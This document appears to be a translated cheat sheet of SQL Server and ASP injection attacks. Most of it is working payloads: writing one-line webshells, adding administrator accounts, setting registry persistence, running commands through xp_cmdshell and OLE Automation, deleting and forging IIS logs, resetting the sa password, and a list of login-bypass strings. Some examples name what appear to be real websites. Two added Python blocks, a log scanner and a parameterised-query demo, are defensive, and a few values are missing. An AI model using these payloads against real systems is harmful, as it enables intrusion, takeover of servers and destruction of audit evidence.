1. Use ^ escape characters to write an ASP "one-line Trojan" file:
- http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';--
- echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
2. Display the SQL Server version:
- http://192.168.1.5/display.asp?keyno=188 and 1=(select @@VERSION)
- http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@version)--
Microsoft VBScript compiler error '800a03f6'
Expected 'End'
/iisHelp/common/500-100.asp, line 242
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.0 (Build 2195: Service Pack 4)' to a column of data type int.
/display.asp, line 17
3. When testing the vulnerabilities of Sony's Chinese website, it was clear that a vulnerability existed, but it did not fit any of the three known injection types. By chance I remembered that the keyword "in" can be used in SQL, for example "select * from mytable where id in (1)", where the value in the brackets is the data we submit; the result is exactly the same as that of "select * from mytable where id = 1". So if you append ") and 1=1 and 1 in (1" to the URL, the original SQL statement becomes "select * from mytable where id in (1) and 1=1 and 1 in (1)", and the long-awaited page appears. For now I call this type of vulnerability the "numeric IN type"; if you are smart you will already have thought of the "string IN type", which is caused by a query such as "select * from mytable where name in ('firstsee')".
4. Check whether the xp_cmdshell extended stored procedure exists:
http://192.168.1.5/display.asp?keyno=188 and 1=(select count(*) FROM master.dbo.sysobjects where xtype='X' AND name='xp_cmdshell')
Command to restore the xp_cmdshell extended stored procedure:
http://www.test.com/news/show1.asp?newsid=125272;exec master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetput\web\xplog70.dll';--
5. Write a command line or program into the Startup (Run) registry key:
http://192.168.1.5/display.asp?keyno=188;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','help1','REG_SZ','cmd.exe /c net user test ptlove /add'
6. View the current database name:
- http://192.168.1.5/display.asp?keyno=188 and 0<>db_name(n)   (change n to 0, 1, 2, 3, ... to walk through the databases on the server)
- http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,db_name())--
Microsoft VBScript compiler error '800a03f6'
Expected 'End'
/iisHelp/common/500-100.asp, line 242
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'huidahouse' to a column of data type int.
/display.asp, line 17
7. List all database names:
select * from master.dbo.sysdatabases   (lists every column of every record)
select name from master.dbo.sysdatabases   (lists only the name column)
8. xp_cmdshell is not required to run CMD commands on an injectable SQL Server; the OLE Automation procedures can be used instead:
CREATE TABLE mytmp (info VARCHAR(400), ID int IDENTITY(1,1) NOT NULL)
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell', @shell OUTPUT
EXEC sp_oamethod @shell, 'run', NULL, 'cmd.exe /c dir c:\ > c:\temp.txt', '0', 'true'
-- Note: the run parameter 'true' means wait for the program to finish before returning. It must be used for long-running commands such as ping.
EXEC sp_oacreate 'scripting.filesystemobject', @fso OUTPUT
EXEC sp_oamethod @fso, 'opentextfile', @file OUT, 'c:\temp.txt'
-- Because the FSO OpenTextFile method returns a TextStream object, @file is an object token.
WHILE @shell > 0
BEGIN
EXEC sp_oamethod @file, 'readline', @out OUT
INSERT INTO mytmp (info) VALUES (@out)
EXEC sp_oagetproperty @file, 'atendofstream', @isEnd OUT
IF @isEnd = 1 BREAK
ELSE CONTINUE
END
DROP TABLE mytmp
----------
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell', @shell OUTPUT
EXEC sp_oamethod @shell, 'run', NULL, 'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll" > c:\temp.txt', '0', 'true'
EXEC sp_oacreate 'scripting.filesystemobject', @fso OUTPUT
EXEC sp_oamethod @fso, 'opentextfile', @file OUT, 'c:\temp.txt'
WHILE @shell > 0
BEGIN
EXEC sp_oamethod @file, 'readline', @out OUT
INSERT INTO mytmp (info) VALUES (@out)
EXEC sp_oagetproperty @file, 'atendofstream', @isEnd OUT
IF @isEnd = 1 BREAK
ELSE CONTINUE
END
Add the web user to the Administrators group, as a single line:
DECLARE @shell int DECLARE @fso int DECLARE @file int DECLARE @isEnd bit DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell OUTPUT EXEC sp_oamethod @shell,'run',NULL,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll" > c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso OUTPUT EXEC sp_oamethod @fso,'opentextfile',@file OUT,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'readline',@out OUT INSERT INTO mytmp(info) VALUES(@out) EXEC sp_oagetproperty @file,'atendofstream',@isEnd OUT IF @isEnd=1 BREAK ELSE CONTINUE END
Execute an EXE program, as a single line:
DECLARE @shell int DECLARE @fso int DECLARE @file int DECLARE @isEnd bit DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell OUTPUT EXEC sp_oamethod @shell,'run',NULL,'cmd.exe /c cscript.exe E:\bjeea.net.cn\score\fts\images\iis.vbs lh1 c:\ > c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso OUTPUT EXEC sp_oamethod @fso,'opentextfile',@file OUT,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'readline',@out OUT INSERT INTO mytmp(info) VALUES(@out) EXEC sp_oagetproperty @file,'atendofstream',@isEnd OUT IF @isEnd=1 BREAK ELSE CONTINUE END
Three ways to execute CMD commands from SQL:
First, delete the log of 18 July:
(1) exec master.dbo.xp_cmdshell 'del C:\winnt\system32\logfiles\W3SVC5\ex050718.log > c:\temp.txt'
(2) DECLARE @shell int DECLARE @fso int DECLARE @file int DECLARE @isEnd bit DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell OUTPUT EXEC sp_oamethod @shell,'run',NULL,'cmd.exe /c del C:\winnt\system32\logfiles\W3SVC5\ex050718.log > c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso OUTPUT EXEC sp_oamethod @fso,'opentextfile',@file OUT,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'readline',@out OUT INSERT INTO mytmp(info) VALUES(@out) EXEC sp_oagetproperty @file,'atendofstream',@isEnd OUT IF @isEnd=1 BREAK ELSE CONTINUE END
(3) First enable Jet sandbox mode. The registry can be modified through the xp_regwrite extended stored procedure, which an administrator cannot prevent. For security reasons sandbox mode is not enabled by default, which is why xp_regwrite is needed. xp_regwrite requires at least the db_owner role; for convenience we recommend testing with sysadmin:
- exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','Software\Microsoft\Jet\4.0\Engines','SandboxMode','REG_DWORD',1
Note on the SandboxMode values:
0  disabled for everything (default)
1  enabled for Access, disabled for everything else
2  disabled for Access, enabled for everything else
3  enabled for everything
- Only the commands used with sysadmin permission are given here:
select * from openrowset('Microsoft.Jet.OLEDB.4.0',';database=c:\winnt\system32\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
- To create a linked server 'L0op8ack', refer to this command:
EXEC sp_addlinkedserver 'L0op8ack','OLE DB Provider for Jet','Microsoft.Jet.OLEDB.4.0','c:\windows\system32\ias.mdb'
- How to use the linked server:
This method works, but unfortunately the db_owner role is not enough: at least sysadmin, or the combination securityadmin + setupadmin, is required.
sp_addlinkedserver requires sysadmin or setupadmin.
sp_addlinkedsrvlogin requires sysadmin or securityadmin.
In the end we found that only the sa account, or an account with setupadmin + securityadmin, can use it,
and administrators generally do not grant those roles to ordinary accounts.
Not practical; recorded only as a learning conclusion.
The general process is as follows. If the login is not sysadmin, the permission check on ias.mdb fails:
during testing I granted setupadmin + securityadmin to the user "hacker" and still could not use ias.mdb.
You need to find an .mdb file that an ordinary user can access:
- Create the linked server "L0op8ack": EXEC sp_addlinkedserver 'L0op8ack','jetoledb','Microsoft.Jet.OLEDB.4.0','c:\winnt\system32\ias.mdb';--
- exec sp_addlinkedsrvlogin 'L0op8ack','false';-- or
exec sp_addlinkedsrvlogin 'L0op8ack','false',NULL,'test1','ptlove';--
- select * from openquery(L0op8ack,'select shell("cmd.exe /c net user")');--
- exec sp_droplinkedsrvlogin 'L0op8ack','false';--
- exec sp_dropserver 'L0op8ack';--
Another example: replace the log file of 18 July:
(1) exec master.dbo.xp_cmdshell 'copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log > c:\temp.txt'
(2) DECLARE @shell int DECLARE @fso int DECLARE @file int DECLARE @isEnd bit DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell OUTPUT EXEC sp_oamethod @shell,'run',NULL,'cmd.exe /c copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log > c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso OUTPUT EXEC sp_oamethod @fso,'opentextfile',@file OUT,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'readline',@out OUT INSERT INTO mytmp(info) VALUES(@out) EXEC sp_oagetproperty @file,'atendofstream',@isEnd OUT IF @isEnd=1 BREAK ELSE CONTINUE END
(3) DECLARE @shell int DECLARE @fso int DECLARE @file int DECLARE @isEnd bit DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell OUTPUT EXEC sp_oamethod @shell,'run',NULL,'cmd.exe /c net user > c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso OUTPUT EXEC sp_oamethod @fso,'opentextfile',@file OUT,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'readline',@out OUT INSERT INTO mytmp(info) VALUES(@out) EXEC sp_oagetproperty @file,'atendofstream',@isEnd OUT IF @isEnd=1 BREAK ELSE CONTINUE END
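From the defender's side, every technique in sections 1 to 8 leaves a recognisable trace in the web server's request log: a stacked query calling xp_cmdshell, sp_oacreate, xp_regwrite, sp_addextendedproc or a linked-server procedure, or a convert(int, ...) used for error-based disclosure. As an added example (not code from the original page), a small Python scanner that URL-decodes the query string of W3C-style log lines and reports which of those patterns it sees; the log field order and all sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Patterns for the techniques listed on this page; all run on the
# URL-decoded query string, case-insensitively.
INDICATORS = {
    "stacked_xp_cmdshell": re.compile(r";\s*exec\s+.*xp_cmdshell", re.I),
    "ole_automation": re.compile(r"sp_oa(create|method|getproperty)", re.I),
    "registry_access": re.compile(r"xp_reg(write|read)", re.I),
    "extended_proc_restore": re.compile(r"sp_addextendedproc", re.I),
    "linked_server_or_jet": re.compile(
        r"sp_addlinkedserver|sp_addlinkedsrvlogin|openrowset|openquery", re.I),
    "error_based_disclosure": re.compile(
        r"convert\s*\(\s*int\s*,\s*(@@version|db_name\s*\()", re.I),
    "catalog_enumeration": re.compile(
        r"\b(sysobjects|syscolumns|sysdatabases|sysxlogins)\b", re.I),
    "login_bypass": re.compile(r"'\s*or\s*(''\s*=|1\s*=\s*1|'a'\s*=\s*'a)", re.I),
}


def normalize(query_string):
    """URL-decode twice (catches double-encoded payloads) and collapse whitespace."""
    decoded = unquote_plus(unquote_plus(query_string))
    return re.sub(r"\s+", " ", decoded)


def classify_request(url):
    """Return the names of all indicators that match one request URL."""
    if "?" not in url:
        return []
    query = normalize(url.split("?", 1)[1])
    return [name for name, rx in INDICATORS.items() if rx.search(query)]


def scan_log(lines):
    """Return (client_ip, url, indicators) for every matching log line.

    Assumed field order (constructed for this example):
    date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
    """
    findings = []
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(" ", 6)
        if len(fields) < 7:
            continue
        _date, _time, ip, _method, stem, query, _status = fields
        url = stem if query == "-" else stem + "?" + query
        hits = classify_request(url)
        if hits:
            findings.append((ip, url, hits))
    return findings


# Constructed sample log: two benign requests and three using techniques from this page.
SAMPLE_LOG = """#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2005-07-18 10:01:02 10.0.0.7 GET /display.asp keyno=188 200
2005-07-18 10:01:09 10.0.0.7 GET /display.asp keyno=188+and+1=convert(int,@@version)-- 500
2005-07-18 10:02:31 10.0.0.7 GET /display.asp keyno=188;exec+master.dbo.xp_cmdshell+'dir'-- 500
2005-07-18 10:03:00 10.0.0.7 GET /login.asp user=%27+or+%27%27%3D%27&pwd=x 302
2005-07-18 10:04:00 10.0.0.9 GET /FullStory.asp id=42 200""".splitlines()
```

Running scan_log(SAMPLE_LOG) flags the three requests from 10.0.0.7 and leaves the two ordinary page views alone.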
9. Update table data:
http://xxx.xxx.xxx/abc.asp?p=YY;update upload.dbo.admin set pwd='a0b923820dcc509a' where username='www';--
The 16-character MD5 value a0b923820dcc509a for the www user's password means the password has been changed to 1;
The 32-character MD5 value is: , and the password is
10. Export table contents to a file
SQL Server has the BCP command, which can export the contents of a table to a text file at a specified location. Using it, we can first create a temporary table, insert a one-line ASP Trojan into it, and then use BCP to export it as an ASP file.
The command-line format is:
bcp "select * from temp" queryout c:\inetpub\wwwroot\runcommand.asp -c -S localhost -U sa -P upload
(-S is the server on which the query runs, -U the user name and -P the password; the result is an uploaded runcommand.asp Trojan.)
11. Creating a table, writing data into it and reading it back
- Create the table:
'and 1=1 union select 1,2,4;create table [dbo].[cyfd]([gyfd] [char](255))--
- Write data into the table:
'and 1=1 union select 1,2,4;DECLARE @result varchar(255) select top 1 @result=name from upload.dbo.sysobjects where xtype='U' and status>0 insert into cyfd(gyfd) values(@result);--
'and 1=1 union select 1,2,4;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','System\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/',@result output insert into cyfd(gyfd) values(@result);--
- Read data from the table:
'and 1=(select count(*) from cyfd where gyfd>1)--
- Delete the temporary table:
';drop table cyfd;--
12. Change the sa password directly with SQL:
- update master.dbo.sysxlogins set password=<hash value missing from source> where sid=0x01, which sets the sa password to 111111. The countermeasure is to delete sa; for details see my write-up on deleting sa.
- View all database logins on the machine:
select * from master.dbo.sysxlogins
select name,sid,password,dbid from master.dbo.sysxlogins
- To change the sa password, run:
exec sp_password NULL,'new password','sa'
13. Query all table names and table structures in the dvbbs database:
- select * from dvbbs.dbo.sysobjects where xtype='U' and status>0
- select * from dvbbs.dbo.syscolumns where id=1426104121
14. Manually back up the current database:
Full backup:
;declare @a sysname,@s nvarchar(4000)
select @a=db_name(),@s='c:/db1' backup database @a to disk=@s WITH FORMAT--
Differential backup:
;declare @a sysname,@s nvarchar(4000)
select @a=db_name(),@s='c:/db1' backup database @a to disk=@s with differential,FORMAT--
15. Add and delete a user test with sa (sysadmin) permission:
exec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin
cmd.exe /c isql -E /U alma /P /i K:\test.qry
16. select * from ChouYFD.dbo.sysobjects where xtype='U' and status>0
lists the names of all user-created tables in ChouYFD.
select name,id from ChouYFD.dbo.sysobjects where xtype='U' and status>0
17.
- http://www.npc.gov.cn/zgrdw/common/image_view.jsp?sqlstr=select * from rdweb.dbo.syscolumns (where id=1234)
lists the field names of all tables in the rdweb database
- select * from dvbbs.dbo.syscolumns where id=5575058
lists all field names of the table whose id is 5575058
18. Delete record command: delete from Dv_topic where boardid=5 and topicid=7978
19. Bypassing login verification to enter the admin backend:
1) ' or ''='
2) ' or 1=1--
3) ' or 'a'='a--
4) 'or'='or'
5) " or 1=1--
6) or 1=1--
7) or 'a'='a
8) " or "a"="
9) ') or ('a'='a
10) ") or ("a"="
11) or (1=1
12) ' or ''='
13) popularity%' and 1=1 and '%'='
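Every payload in the list above depends on the login query being assembled by string concatenation, so the quote closes the literal and the rest of the input becomes SQL. As an added example (not code from the original page), the vulnerable pattern beside its parameterised fix, run against an in-memory SQLite table; SQLite is used only because it runs in-process and accepts the same -- comment syntax, and the admin table with user www is constructed.

```python
import hashlib
import sqlite3


def hash_pwd(password):
    # Unsalted hash only to mirror the stored-hash column from section 9; not a recommendation.
    return hashlib.sha256(password.encode()).hexdigest()


def make_db():
    """Constructed sample: an admin table like the one in section 9, with one user."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE admin (username TEXT, pwd TEXT)")
    con.execute("INSERT INTO admin VALUES (?, ?)", ("www", hash_pwd("1")))
    return con


def login_concat(con, username, password):
    """Vulnerable pattern: the submitted username is pasted into the SQL text,
    so a value such as  ' or 1=1--  closes the quote, makes the WHERE clause
    always true and comments out the password check."""
    sql = ("SELECT username FROM admin WHERE username = '" + username +
           "' AND pwd = '" + hash_pwd(password) + "'")
    return [row[0] for row in con.execute(sql)]


def login_param(con, username, password):
    """Hardened form: placeholders keep the input as data, never as SQL, so the
    same payload is just a username that does not exist."""
    sql = "SELECT username FROM admin WHERE username = ? AND pwd = ?"
    return [row[0] for row in con.execute(sql, (username, hash_pwd(password)))]


if __name__ == "__main__":
    con = make_db()
    payload = "' or 1=1--"
    print("concatenated:", login_concat(con, payload, "wrong"))  # bypassed
    print("parameterised:", login_param(con, payload, "wrong"))  # no rows
```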
20. How to find the website path:
1) Command to view the web site's installation directory:
- cscript c:\inetpub\adminscripts\adsutil.vbs enum w3svc/2/root > c:\test1.txt   (replace 2 with 1, 3, 4, 5, ...)
type c:\test1.txt
del c:\test1.txt
The results can be displayed directly in NBSI, so there is no need to export them to files.
2) Pick any image on the website, say 123.jpg,
then write the following batch file 123.bat:
d:
dir 123.jpg /s >> c:\123.txt
e:
dir 123.jpg /s >> c:\123.txt
f:
dir 123.jpg /s >> c:\123.txt
After it runs: type c:\123.txt
The website path can then be worked out from the output.
3) If SQL Server and the web server are on the same machine and commands can be executed,
redirect the command's output into
%windir%\help\iishelp\common\404b.htm or 500.asp.
Note: back up both files before writing to them.
For example:
dir c:\ > %windir%\help\iishelp\common\404b.htm
Then request a page such as http://<target IP>/2.asp to view the output.
4) On Windows 2000: use xp_regread to read HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots and obtain the web path.
On Windows 2003: the key to read with xp_regread has not been found.
For example:
(1) Create a new table cyfd (with field gyfd): http://www.cnwill.com/NewsShow.aspx?id=4844;create table [dbo].[cyfd]([gyfd] [char](255))--
(2) Write the web path into it: http://www.cnwill.com/NewsShow.aspx?id=4844;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','System\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/',@result output insert into cyfd(gyfd) values(@result);--
(3) Then force a type mismatch so the error page shows it: http://www.cnwill.com/NewsShow.aspx?id=4844 and 1=(select count(*) from cyfd where gyfd>1)
Source: .Net SqlClient Data Provider
Description: Syntax error converting the varchar value 'y:\Web\Yantai talent hotline background management system,201' to a column of data type int.
TargetSite: Boolean Read()   Hahaha.. the path is exposed..
(4) Delete the table: http://www.cnwill.com/NewsShow.aspx?id=4844;drop table cyfd;--
5) Use the regedit command to export the registry, saving the result into the %windir%\help\iishelp\common\404b.htm or 500.asp page.
Regedit command description:
regedit /L:system /R:user /E filename.reg Regpath
Parameter description:
/L:system specifies the path of the system.dat file.
/R:user specifies the path of the user.dat file.
/E tells Registry Editor to export the registry; it is followed by the file name to export to.
Regpath specifies the registry branch to export; if omitted, all branches are exported. Of these parameters, /L:system and /R:user are optional; when they are not given, Registry Editor assumes the system.dat and user.dat files in the Windows directory. If you boot from a floppy into DOS, you must use /L and /R to give the paths of system.dat and user.dat, otherwise Registry Editor cannot find them. For example, after booting into DOS from a boot disk, the command to back up the registry is "regedit /L:C:\windows\ /R:C:\windows\ /e regedit.reg", which backs up the entire registry to the Windows directory under the file name regedit.reg. Entering "regedit /e d:\regedit.reg" backs up the entire registry to the root of drive D as regedit.reg, with /L and /R omitted.
regedit /s c:\adam.reg   (import the file c:\adam.reg into the registry)
regedit /e c:\web.reg   (back up the whole registry to c:\web.reg)
For Windows 2000: C:\> regedit /e %windir%\help\iishelp\common\404b.htm "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots"
Then request http://<target IP>/2.asp
For Windows 2003: not found; I hope a friend who finds it will publish it for discussion.
6) The files under %SystemRoot%\system32\inetsrv\MetaBack\ on the host are IIS backup files, and they are readable by the web user. If IIS has been backed up there, download the file with the webshell and open it in Notepad; you can obtain the corresponding domain name and absolute web path.
7) Create a virtual directory through SQL injection when you have dbo permission but cannot find the absolute web path:
In many cases we run into SQL injection that can list directories and run commands, yet the directory the web root lives in is hard to find, so getting a webshell is difficult. This is a good trick:
- Create a virtual directory win pointing to c:\winnt\system32: exec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
- Give the win directory permission to run ASP scripts: exec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/win/AccessExecute "true" -s:'
- Delete the virtual directory win: exec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\adsutil.vbs delete w3svc/1/root/win/'
- Test: http://127.0.0.1/win/test.asp